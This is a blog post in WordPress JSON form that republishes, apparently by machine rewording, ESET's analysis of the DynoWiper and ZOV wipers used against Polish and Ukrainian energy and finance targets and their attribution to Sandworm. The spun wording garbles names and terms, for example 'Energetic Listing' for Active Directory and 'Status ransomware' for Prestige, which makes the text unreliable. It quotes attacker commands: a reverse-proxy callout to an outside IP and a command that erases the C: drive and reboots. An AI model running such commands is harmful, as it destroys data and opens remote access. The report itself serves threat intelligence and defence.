{"id":11358,"date":"2026-02-01T08:04:54","date_gmt":"2026-02-01T08:04:54","guid":{"rendered":"https:\/\/techtrendfeed.com\/?p=11358"},"modified":"2026-02-01T08:04:55","modified_gmt":"2026-02-01T08:04:55","slug":"dynowiper-replace-technical-evaluation-and-attribution","status":"publish","type":"post","link":"https:\/\/techtrendfeed.com\/?p=11358","title":{"rendered":"DynoWiper replace: Technical evaluation and attribution"},"content":{"rendered":"<p> <br \/>\n<\/p>\n<div>\n<p>On this weblog submit, we offer extra technical particulars associated to our earlier <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.welivesecurity.com\/en\/eset-research\/eset-research-sandworm-cyberattack-poland-power-grid-late-2025\/\" target=\"_blank\" rel=\"noopener\">DynoWiper<\/a> publication.<\/p>\n<blockquote>\n<p><strong>Key factors of the report:<\/strong><\/p>\n<ul>\n<li>ESET researchers recognized new data-wiping malware that we have now named DynoWiper, used in opposition to an power firm in Poland.<\/li>\n<li>The techniques, strategies, and procedures (TTPs) noticed through the DynoWiper incident carefully resemble these seen earlier this 12 months in an incident involving the ZOV wiper in Ukraine: Z, O, and V are Russian navy symbols.<\/li>\n<li>We attribute DynoWiper to Sandworm with medium confidence, in distinction to the ZOV wiper, which we attribute to Sandworm with excessive confidence.<\/li>\n<\/ul>\n<\/blockquote>\n<h2>Sandworm profile<\/h2>\n<p>Sandworm is a Russia-aligned risk group that performs damaging assaults. It&#8217;s largely identified for its assaults in opposition to Ukrainian power firms in 2015-12 and 2016-12, which resulted in energy outages. In 2017-06 Sandworm launched the <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.welivesecurity.com\/2017\/06\/30\/telebots-back-supply-chain-attacks-against-ukraine\/\" target=\"_blank\" rel=\"noopener\">NotPetya data-wiping<\/a> assault that used a supply-chain vector by compromising the Ukrainian accounting software program <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.welivesecurity.com\/2017\/07\/04\/analysis-of-telebots-cunning-backdoor\/\" target=\"_blank\" rel=\"noopener\">M.E.Doc<\/a>. In 2018-02, Sandworm launched the Olympic Destroyer data-wiping assault in opposition to organizers of the 2018 Winter Olympics in Pyeongchang.<\/p>\n<p>The Sandworm group makes use of such superior malware as <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.welivesecurity.com\/2017\/06\/12\/industroyer-biggest-threat-industrial-control-systems-since-stuxnet\/\" target=\"_blank\" rel=\"noopener\">Industroyer<\/a>, which is ready to talk with gear at power firms by way of industrial management protocols. In 2022-04, CERT-UA thwarted an assault in opposition to an power firm in Ukraine the place the Sandworm group tried to deploy a brand new variant of this malware, <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.welivesecurity.com\/2022\/04\/12\/industroyer2-industroyer-reloaded\/\" target=\"_blank\" rel=\"noopener\">Industroyer2<\/a>.<\/p>\n<p>In 2020-10, the US Division of Justice printed an <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.justice.gov\/opa\/pr\/six-russian-gru-officers-charged-connection-worldwide-deployment-destructive-malware-and\" target=\"_blank\" rel=\"noopener\">indictment<\/a> in opposition to six Russian pc hackers that it alleges ready and performed varied Sandworm assaults. The group is often attributed to Unit 74455 of the Russian Principal Intelligence Directorate (GRU).<\/p>\n<h2>Historical past of Sandworm\u2019s damaging operations<\/h2>\n<p>Sandworm is a risk actor identified for conducting damaging cyberattacks, focusing on a variety of entities together with authorities businesses, logistics firms, transportation corporations, power suppliers, media organizations, grain sector firms, and telecommunications firms. These assaults usually contain the deployment of wiper malware \u2013 malicious software program designed to delete information, erase information, and render techniques unbootable.<\/p>\n<p>Its operators have a protracted historical past of conducting such cyberattacks, and we have now documented <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.welivesecurity.com\/2022\/03\/21\/sandworm-tale-disruption-told-anew\/\" target=\"_blank\" rel=\"noopener\">their exercise extensively<\/a>. On this blogpost, we deal with their current operations involving data-wiping malware.<\/p>\n<p>To evade detections by safety merchandise, Sandworm usually modifies the damaging malware it deploys \u2013 generally by introducing minor adjustments or by producing newly compiled variants from the unique supply code, and different instances by abandoning a specific wiper altogether and switching to a wholly new malware household for its operations. We hardly ever see Sandworm try and deploy a damaging malware pattern that was utilized in an earlier assault (for instance, one with a identified hash) or one that&#8217;s already detected on the time of deployment.<\/p>\n<p>Since February 2022, we have now been totally monitoring incidents involving damaging malware and have publicly documented our findings in studies resembling <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.welivesecurity.com\/2023\/02\/24\/year-wiper-attacks-ukraine\/\" target=\"_blank\" rel=\"noopener\">A 12 months of wiper assaults in Ukraine<\/a>. Over time, Sandworm has deployed a variety of damaging malware households, together with, in roughly chronological order, <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.welivesecurity.com\/2022\/03\/01\/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine\/\" target=\"_blank\" rel=\"noopener\">HermeticWiper<\/a>, <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.welivesecurity.com\/2022\/03\/01\/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine\/\" target=\"_blank\" rel=\"noopener\">HermeticRansom<\/a>, <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/x.com\/ESETresearch\/status\/1503436420886712321\" target=\"_blank\" rel=\"noopener\">CaddyWiper<\/a>, <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/cert.gov.ua\/article\/38088\" target=\"_blank\" rel=\"noopener\">DoubleZero<\/a>, <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.welivesecurity.com\/2022\/04\/12\/industroyer2-industroyer-reloaded\/\" target=\"_blank\" rel=\"noopener\">ARGUEPATCH<\/a>, <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/cert.gov.ua\/article\/39518\" target=\"_blank\" rel=\"noopener\">ORCSHRED<\/a>, <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/cert.gov.ua\/article\/39518\" target=\"_blank\" rel=\"noopener\">SOLOSHRED<\/a>, <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/cert.gov.ua\/article\/39518\" target=\"_blank\" rel=\"noopener\">AWFULSHRED<\/a>, <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2022\/10\/14\/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland\/\" target=\"_blank\" rel=\"noopener\">Status ransomware<\/a>, <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.welivesecurity.com\/2022\/11\/28\/ransomboggs-new-ransomware-ukraine\/\" target=\"_blank\" rel=\"noopener\">RansomBoggs ransomware<\/a>, <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.welivesecurity.com\/2023\/02\/24\/year-wiper-attacks-ukraine\/\" target=\"_blank\" rel=\"noopener\">SDelete-based wipers<\/a>, <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/cert.gov.ua\/article\/3718487\" target=\"_blank\" rel=\"noopener\">BidSwipe<\/a>, <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/cert.gov.ua\/article\/4501891\" target=\"_blank\" rel=\"noopener\">ROARBAT<\/a>, <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.welivesecurity.com\/2023\/01\/27\/swiftslicer-new-destructive-wiper-malware-ukraine\/\" target=\"_blank\" rel=\"noopener\">SwiftSlicer<\/a>, <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/web-assets.esetstatic.com\/wls\/en\/papers\/threat-reports\/eset-apt-activity-report-q2-2023-q3-2023.pdf#page-20\" target=\"_blank\" rel=\"noopener\">NikoWiper<\/a>, <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/web-assets.esetstatic.com\/wls\/en\/papers\/threat-reports\/eset-apt-activity-report-q2-2023-q3-2023.pdf#page-20\" target=\"_blank\" rel=\"noopener\">SharpNikoWiper<\/a>, <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/web-assets.esetstatic.com\/wls\/en\/papers\/threat-reports\/eset-apt-activity-report-q4-2024-q1-2025.pdf#page-22\" target=\"_blank\" rel=\"noopener\">ZEROLOT<\/a>, <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/web-assets.esetstatic.com\/wls\/en\/papers\/threat-reports\/eset-apt-activity-report-q2-2025-q3-2025.pdf#page=21\" target=\"_blank\" rel=\"noopener\">Sting wiper<\/a>, and ZOV wiper. It must be famous that a few of these malware households had been deployed a number of instances throughout quite a few incidents. In 2025, ESET investigated greater than 10 incidents involving damaging malware attributed to Sandworm, nearly all of them occurring in Ukraine.<\/p>\n<p>We repeatedly improve our merchandise to enhance early detection of Sandworm operations \u2013 ideally figuring out exercise earlier than damaging wipers are deployed, and each time potential stopping harm even when beforehand unknown damaging malware is executed. As a result of the vast majority of Sandworm\u2019s cyberattacks at the moment goal Ukraine, we collaborate carefully with our Ukrainian companions, together with the Laptop Emergency Response Staff of Ukraine (<a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/cert.gov.ua\/\" target=\"_blank\" rel=\"noopener\">CERT-UA<\/a>), to help each prevention and remediation efforts.<\/p>\n<p>In addition to Ukraine, Sandworm has a decade-long historical past of focusing on firms in Poland, together with these within the power sector. Sometimes, these operations have been performed covertly for cyberespionage functions, as seen within the <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.virusbulletin.com\/conference\/vb2014\/abstracts\/back-blackenergy-2014-targeted-attacks-ukraine-and-poland\" target=\"_blank\" rel=\"noopener\">BlackEnergy<\/a> and <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.welivesecurity.com\/2018\/10\/17\/greyenergy-updated-arsenal-dangerous-threat-actors\/\" target=\"_blank\" rel=\"noopener\">GreyEnergy<\/a> circumstances. Notably, we detected the primary deployment of GreyEnergy malware at a Polish power firm again in 2015.<\/p>\n<p>Nevertheless, because the begin of Russia\u2019s full-scale invasion of Ukraine, Sandworm has modified its techniques concerning targets in Poland. Particularly, in October 2022, it carried out a damaging assault in opposition to logistics firms in each Ukraine and Poland, disguising the operation as a Status ransomware incident. Microsoft Menace Intelligence <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2022\/10\/14\/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland\/\">reported<\/a> on the Status ransomware incidents, which they attributed to Seashell Blizzard (aka Sandworm). At ESET, we detected the Status ransomware household and <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/01\/eset_apt_activity_report_t32022.pdf?store_id=9750#page=11\" target=\"_blank\" rel=\"noopener\">publicly attributed<\/a> this exercise to Sandworm.<\/p>\n<p>In December 2025, we detected the deployment of a damaging malware pattern, which we named <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.welivesecurity.com\/en\/eset-research\/eset-research-sandworm-cyberattack-poland-power-grid-late-2025\/\" target=\"_blank\" rel=\"noopener\">DynoWiper<\/a>, at an power firm in Poland. The put in EDR\/XDR product, ESET PROTECT, blocked execution of the wiper, considerably limiting its influence within the surroundings. On this blogpost, we reveal extra particulars about this exercise and description our attribution course of.<\/p>\n<p>CERT Polska did a wonderful job investigating the incident and printed an in depth evaluation <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/cert.pl\/en\/posts\/2026\/01\/incident-report-energy-sector-2025\/\" target=\"_blank\" rel=\"noopener\">in a report<\/a> accessible on its web site.<\/p>\n<h2>DynoWiper<\/h2>\n<p>On December 29<sup>th<\/sup>, 2025, DynoWiper samples had been deployed to the <span style=\"font-family: courier new, courier, monospace;\">C:inetpubpub<\/span> listing, which is probably going a shared listing within the sufferer\u2019s area, with the next filenames: <span style=\"font-family: courier new, courier, monospace;\">schtask.exe<\/span>, <span style=\"font-family: courier new, courier, monospace;\">schtask2.exe<\/span>, and <span style=\"font-family: courier new, courier, monospace;\"><redacted>_update.exe<\/redacted><\/span>. The <span style=\"font-family: courier new, courier, monospace;\">schtask*.exe<\/span> samples comprise the PDB path <span style=\"font-family: courier new, courier, monospace;\">C:UsersvagrantDocumentsVisual Studio 2013ProjectsSourceReleaseSource.pdb<\/span>. The username vagrant corresponds to a device known as <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/developer.hashicorp.com\/vagrant\" target=\"_blank\" rel=\"noopener\">Vagrant<\/a>, which can be utilized to handle digital machines. This implies that the machine that was used to construct the wiper is a Vagrant field or, extra probably, a bunch system that manages digital machines utilizing Vagrant. It&#8217;s due to this fact potential that Sandworm operators first examined the operation on digital machines earlier than deploying the malware within the goal group.<\/p>\n<p>The attackers initially deployed <span style=\"font-family: courier new, courier, monospace;\"><redacted>_update.exe<\/redacted><\/span> (PE timestamp: 2025\u201112\u201126 13:51:11). When this try failed, they modified the wiper code, constructed it, after which deployed <span style=\"font-family: courier new, courier, monospace;\">schtask.exe<\/span> (PE timestamp: 2025\u201112\u201129 13:17:06). This try additionally appears to have been unsuccessful, so that they rebuilt the wiper with barely modified code, leading to <span style=\"font-family: courier new, courier, monospace;\">schtask2.exe<\/span> (PE timestamp: 2025\u201112\u201129 14:10:07). It&#8217;s probably that even this closing try failed. All three samples had been deployed on the identical day \u2013 December 29<sup>th<\/sup>, 2025. ESET PROTECT was put in on the focused machines and seems to have interfered with the execution of all three variants.<\/p>\n<p>DynoWiper\u2019s workflow will be divided into three distinct phases, that are described later within the textual content. The <span style=\"font-family: courier new, courier, monospace;\">schtask*.exe<\/span> samples embrace solely the primary two phases and introduce a five-second delay between them. In distinction, <span style=\"font-family: courier new, courier, monospace;\"><redacted>_update.exe<\/redacted><\/span> implements all three phases and doesn&#8217;t embrace the five-second delay.<\/p>\n<p>The wiper overwrites information utilizing a 16-byte buffer that incorporates random information generated as soon as in the beginning of the wiper\u2019s execution. Recordsdata of dimension 16 bytes or fewer are totally overwritten, with smaller information being prolonged to 16 bytes. To hurry up the destruction course of, different information (bigger than 16 bytes) have just some elements of their contents overwritten.<\/p>\n<p>In the course of the first section, the malware recursively wipes information on all detachable and glued drives, excluding particular directories (utilizing case-insensitive comparability):<\/p>\n<ul>\n<li><span style=\"font-family: courier new, courier, monospace;\">system32<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">home windows<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">program information<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">program information(x86)<\/span> (an area is lacking earlier than the open bracket)<\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">temp<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">recycle.bin<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">$recycle.bin<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">boot<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">perflogs<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">appdata<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">paperwork and settings<\/span><\/li>\n<\/ul>\n<p>For <span style=\"font-family: courier new, courier, monospace;\"><redacted>_update.exe<\/redacted><\/span> and <span style=\"font-family: courier new, courier, monospace;\">schtask.exe<\/span>, the second section behaves equally, however this time the beforehand excluded directories should not skipped within the root listing (e.g., <span style=\"font-family: courier new, courier, monospace;\">C:<\/span>). In consequence, a path like <span style=\"font-family: courier new, courier, monospace;\">C:Home windows<\/span> is now not excluded, whereas <span style=\"font-family: courier new, courier, monospace;\">C:WindowsSystem32<\/span> nonetheless is. For <span style=\"font-family: courier new, courier, monospace;\">schtask2.exe<\/span>, within the second section, all information and directories on detachable and glued drives are eliminated by way of the <span style=\"font-family: courier new, courier, monospace;\">DeleteFileW<\/span> API with out skipping any directories, and with out overwriting information.<\/p>\n<p>The third section forces the system to reboot, finishing the destruction of the system.<\/p>\n<p>Not like <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.welivesecurity.com\/2017\/06\/12\/industroyer-biggest-threat-industrial-control-systems-since-stuxnet\/\" target=\"_blank\" rel=\"noopener\">Industroyer<\/a> and <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.welivesecurity.com\/2022\/04\/12\/industroyer2-industroyer-reloaded\/\" target=\"_blank\" rel=\"noopener\">Industroyer2<\/a>, the found DynoWiper samples focus solely on the IT surroundings, with no noticed performance focusing on OT (<a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/en.wikipedia.org\/wiki\/Operational_technology\" target=\"_blank\" rel=\"noopener\">operational know-how<\/a>) industrial elements. Nevertheless, this doesn&#8217;t exclude the chance that such capabilities had been current elsewhere within the assault chain.<\/p>\n<h3>Different instruments deployed<\/h3>\n<p>We recognized extra instruments used inside the identical community previous to deployment of the wiper.<\/p>\n<p>In early phases of the assault, attackers tried to obtain the publicly accessible <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/github.com\/GhostPack\/Rubeus\">Rubeus<\/a> device. The next path was used: <span style=\"font-family: courier new, courier, monospace;\">c:customers<username>downloadsrubeus.exe<\/username><\/span>.<\/p>\n<p>In early December 2025, attackers tried to dump the LSASS course of utilizing Home windows Process Supervisor. Moreover, they tried to obtain and launch a publicly accessible SOCKS5 proxy device known as <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/github.com\/b23r0\/rsocx\" target=\"_blank\" rel=\"noopener\">rsocx<\/a>. The attackers tried to execute this proxy in reverse-connect mode utilizing the command line <span style=\"font-family: courier new, courier, monospace;\">C:Customers<username>Downloadsr.exe -r 31.172.71[.]5:8008<\/username><\/span>. This server is utilized by ProGame (<span style=\"font-family: courier new, courier, monospace;\">progamevl[.]ru<\/span>), a programming faculty for teenagers in Vladivostok, Russia, and was probably compromised.<\/p>\n<h2>ZOV wiper<\/h2>\n<p>We recognized a number of similarities to beforehand identified damaging malware, particularly to the wiper we have now named ZOV, which we attribute to Sandworm with excessive confidence. DynoWiper operates in a broadly comparable trend to the ZOV wiper. Notably, the exclusion of sure directories and particularly the clear separate logic current within the code for wiping smaller and bigger information can be discovered within the ZOV wiper.<\/p>\n<p>ZOV is damaging malware that we detected being deployed in opposition to a monetary establishment in Ukraine in November 2025.<\/p>\n<p>As soon as executed, the ZOV wiper iterates over information on all mounted drives and wipes them by overwriting their contents. It skips information in these directories:<\/p>\n<ul>\n<li><span style=\"font-family: courier new, courier, monospace;\">$Recycle.Bin<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">AppData<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">Software Knowledge<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">Program Recordsdata<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">Program Recordsdata (x86)<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">Temp<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">Home windows<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">Home windows.outdated<\/span><\/li>\n<\/ul>\n<p>How a file is wiped relies on its dimension. To destroy information as rapidly as potential, information smaller than 4,098 bytes have their whole contents overwritten; bigger information have just some elements of their contents overwritten. The buffer, which is repeatedly written to information, is of dimension 4,098 bytes, and begins with the string <span style=\"font-family: courier new, courier, monospace;\">ZOV<\/span> (referring to the <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/en.wikipedia.org\/wiki\/Z_(military_symbol)\" target=\"_blank\" rel=\"noopener\">Russian navy symbols<\/a>) adopted by null bytes.<\/p>\n<p>After finishing this fast wipe, it prints what number of directories and information had been wiped, and runs the shell command time <span style=\"font-family: courier new, courier, monospace;\">\/t &amp; ver &amp; rmdir C: \/s \/q &amp;&amp; dir &amp;&amp; shutdown \/r<\/span> (print present native time and Home windows model, erase the contents of the <span style=\"font-family: courier new, courier, monospace;\">C:<\/span> drive, checklist the present working listing, and initiates a system reboot).<\/p>\n<p>Proper earlier than exiting, the wiper drops a picture from its assets to <span style=\"font-family: courier new, courier, monospace;\">%appdatapercentLocWall.jpg<\/span> and units it because the desktop background. As proven in Determine 1, the wallpaper additionally has the ZOV image.<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 1. Wallpaper dropped by the ZOV wiper\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2026\/01-26\/dynowiper\/figure-1.png\" alt=\"Figure 1. Wallpaper dropped by the ZOV wiper\" width=\"\" height=\"\"\/><figcaption><em>Determine 1. Wallpaper dropped by the ZOV wiper<\/em><\/figcaption><\/figure>\n<p>There was one other ZOV wiper case at an power firm in Ukraine, the place the attackers deployed the wiper on January 25<sup>th<\/sup>, 2024. Within the noticed pattern, the buffer that&#8217;s written to information doesn&#8217;t comprise the ZOV image. As a substitute, it incorporates the one character P adopted by null bytes. Additionally, the textual content within the dropped picture (see Determine 2) resembles a ransom observe however refers to a nonexistent Bitcoin handle.<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 2. Wallpaper dropped by the ZOV wiper (2024 case)\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2026\/01-26\/dynowiper\/figure-2.png\" alt=\"Figure 2. Wallpaper dropped by the ZOV wiper (2024 case)\" width=\"\" height=\"\"\/><figcaption><em>Determine 2. Wallpaper dropped by the ZOV wiper (2024 case)<\/em><\/figcaption><\/figure>\n<h2>Harmful malware deployment strategies<\/h2>\n<p>Sandworm usually abuses Energetic Listing Group Coverage to deploy its data-wiping malware throughout all machines inside a compromised community. Group-wide GPO deployment typically requires Area Admin privileges and is usually staged from a website controller. This exercise underscores Sandworm\u2019s sophistication and its confirmed potential to acquire high-privilege Energetic Listing entry throughout many intrusions.<\/p>\n<p>In the course of the incident response to the Industroyer2 assault in April 2022, CERT\u2011UA found a PowerShell script they named <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/cert.gov.ua\/article\/39518\">POWERGAP<\/a>. Sandworm had been utilizing this script continuously to deploy varied data-wiping malware throughout a number of organizations. Later, in November 2022, ESET researchers discovered that the identical script had been used to distribute the <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/twitter.com\/ESETresearch\/status\/1596181925663760386\">RansomBoggs<\/a> ransomware in Ukraine. Nevertheless, sooner or later Sandworm stopped utilizing this deployment script, but continued deploying damaging malware by way of Energetic Listing Group Coverage.<\/p>\n<p>Apparently, through the evaluation of the ZOV wiper incident, we recognized a more recent PowerShell script used to deploy the ZOV wiper. This script incorporates hardcoded variables particular to the sufferer\u2019s surroundings, together with the area controller identify, area identify, Group Coverage Object (GPO) identify, deployed filename, file path, GPO hyperlink string, and scheduled process identify. As soon as executed, the script performs all essential actions to distribute the malicious binary to customers and computer systems throughout your complete area.<\/p>\n<p>Extra considerably, a deployment script with very comparable performance, however with out sturdy code similarity, was found getting used to deploy the DynoWiper malware in a Polish power firm. In that case, nonetheless, the malicious binary was not distributed to particular person computer systems however was as a substitute executed immediately from a shared community listing.<\/p>\n<p>As talked about above, operations of this data-wiping nature generally require a risk actor to own Area Admin privileges. As soon as a risk actor reaches this degree of entry, defending the surroundings turns into extraordinarily tough, as they will carry out practically any motion inside the area. Some organizations, significantly within the power sector, additionally deliberately section or isolate elements of their IT\/OT environments to fulfill operational and security necessities. Whereas this isolation will be an acceptable risk-management alternative, it usually reduces defender visibility and might gradual proof assortment and response workflows, which in flip can complicate incident investigation and end in lower-confidence attribution.<\/p>\n<h2>Attribution<\/h2>\n<p>We attribute DynoWiper to Sandworm with medium confidence. The next components help our evaluation:<\/p>\n<ul>\n<li>There&#8217;s a sturdy overlap between the TTPs noticed on this exercise and people usually related to Sandworm operations. Particularly, the usage of data-wiping malware and its deployment by way of Energetic Listing Group Coverage are each strategies generally employed by Sandworm. As described above, we recognized similarities in each the wipers used and the Group Coverage deployment script when evaluating this case to earlier Sandworm exercise.<\/li>\n<li>The focused trade aligns with Sandworm\u2019s typical pursuits. This group continuously targets power firms and has a confirmed observe document of attacking OT environments.<\/li>\n<li>Traditionally, Sandworm has focused Polish power firms for cyberespionage functions, utilizing the BlackEnergy and GreyEnergy malware households.<\/li>\n<li>We&#8217;re not conscious of some other lately lively risk actors which have used data-wiping malware of their operations in opposition to targets in European Union international locations.<\/li>\n<\/ul>\n<p>The next components contradict a Sandworm attribution:<\/p>\n<p>Though Sandworm has beforehand focused firms in Poland, it usually did so covertly \u2013 both for cyberespionage functions solely or by disguising its data-wiping exercise as a ransomware assault, resembling within the Status ransomware incidents. It&#8217;s value noting that we solely attribute the data-wiping part of this exercise to Sandworm with medium confidence. We shouldn&#8217;t have visibility into the preliminary entry methodology used on this incident and due to this fact can&#8217;t assess how or by whom the primary steps had been carried out. Specifically, the preparatory phases main as much as the damaging exercise might have been performed by one other risk actor group collaborating with Sandworm. Notably, in 2025 we <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/web-assets.esetstatic.com\/wls\/en\/papers\/threat-reports\/eset-apt-activity-report-q2-2025-q3-2025.pdf#page=21\">noticed<\/a> and confirmed that the UAC\u20110099 group performed preliminary entry operations in opposition to targets in Ukraine and subsequently handed off validated targets to Sandworm for follow-up exercise.<\/p>\n<h2>Conclusion<\/h2>\n<p>This incident represents a uncommon and beforehand unseen case by which a Russia-aligned risk actor deployed damaging, data-wiping malware in opposition to an power firm in Poland.<\/p>\n<blockquote>\n<div><em>For any inquiries about our analysis printed on WeLiveSecurity, please contact us at <a rel=\"nofollow\" target=\"_blank\" style=\"background-color: #f4f4f4;\" href=\"https:\/\/www.welivesecurity.com\/en\/eset-research\/dynowiper-update-technical-analysis-attribution\/mailto:threatintel@eset.com?utm_source=welivesecurity.com&amp;utm_medium=referral&amp;utm_campaign=autotagging&amp;utm_content=eset-research&amp;utm_term=en\">threatintel@eset.com<\/a>.\u00a0<\/em><\/div>\n<div><em>ESET Analysis provides non-public APT intelligence studies and information feeds. For any inquiries about this service, go to the <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.eset.com\/int\/business\/services\/threat-intelligence\/?utm_source=welivesecurity.com&amp;utm_medium=referral&amp;utm_campaign=wls-research&amp;utm_content=dynowiper-update-technical-analysis-attribution&amp;sfdccampaignid=7011n0000017htTAAQ\" target=\"_blank\" rel=\"noopener\">ESET Menace Intelligence<\/a> web page.<\/em><\/div>\n<\/blockquote>\n<h2>IoCs<\/h2>\n<table border=\"1\" width=\"642\" cellspacing=\"0\" cellpadding=\"0\">\n<thead>\n<tr>\n<td width=\"179\"><strong>SHA-1<\/strong><\/td>\n<td width=\"161\"><strong>Filename<\/strong><\/td>\n<td width=\"170\"><strong>Detection<\/strong><\/td>\n<td width=\"132\"><strong>Description<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">472CA448F82A7FF6F373<wbr\/>A32FDB9586FD7C38B631<\/span><\/td>\n<td width=\"161\"><span style=\"font-family: courier new, courier, monospace;\">TMP_Backup.tmp.exe<\/span><\/td>\n<td width=\"170\">Win32\/KillFiles.NMJ<\/td>\n<td width=\"132\">ZOV wiper.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">4F8E9336A784A1963530<wbr\/>23133E0F8FA54F6A92E2<\/span><\/td>\n<td width=\"161\"><span style=\"font-family: courier new, courier, monospace;\">TS_5WB.tmp.exe<\/span><\/td>\n<td width=\"170\">Win32\/KillFiles.NMJ<\/td>\n<td width=\"132\">ZOV wiper.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">4EC3C90846AF6B79EE1A<wbr\/>5188EEFA3FD21F6D4CF6<\/span><\/td>\n<td width=\"161\"><span style=\"font-family: courier new, courier, monospace;\"><redacted>_update.exe<\/redacted><\/span><\/td>\n<td width=\"170\">Win32\/KillFiles.NMO<\/td>\n<td width=\"132\">DynoWiper.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">86596A5C5B05A8BFBD14<wbr\/>876DE7404702F7D0D61B<\/span><\/td>\n<td width=\"161\"><span style=\"font-family: courier new, courier, monospace;\">schtask.exe<\/span><\/td>\n<td width=\"170\">Win32\/KillFiles.NMO<\/td>\n<td width=\"132\">DynoWiper.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">69EDE7E341FD26FA0577<wbr\/>692B601D80CB44778D93<\/span><\/td>\n<td width=\"161\"><span style=\"font-family: courier new, courier, monospace;\">schtask2.exe<\/span><\/td>\n<td width=\"170\">Win32\/KillFiles.NMO<\/td>\n<td width=\"132\">DynoWiper.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">9EC4C38394EA2048CA81<wbr\/>D48B1BD66DE48D8BD4E8<\/span><\/td>\n<td width=\"161\"><span style=\"font-family: courier new, courier, monospace;\">rsocx.exe<\/span><\/td>\n<td width=\"170\">Win64\/HackTool.Rsocx.A<\/td>\n<td width=\"132\">rsocx SOCKS5 proxy device.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">410C8A57FE6E09EDBFEB<wbr\/>ABA7D5D3E4797CA80A19<\/span><\/td>\n<td width=\"161\"><span style=\"font-family: courier new, courier, monospace;\">Rubeus.exe<\/span><\/td>\n<td width=\"170\">MSIL\/Riskware.Rubeus.A<\/td>\n<td width=\"132\">Rubeus toolset for Kerberos assaults.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3>Community<\/h3>\n<table border=\"1\" width=\"642\" cellspacing=\"0\" 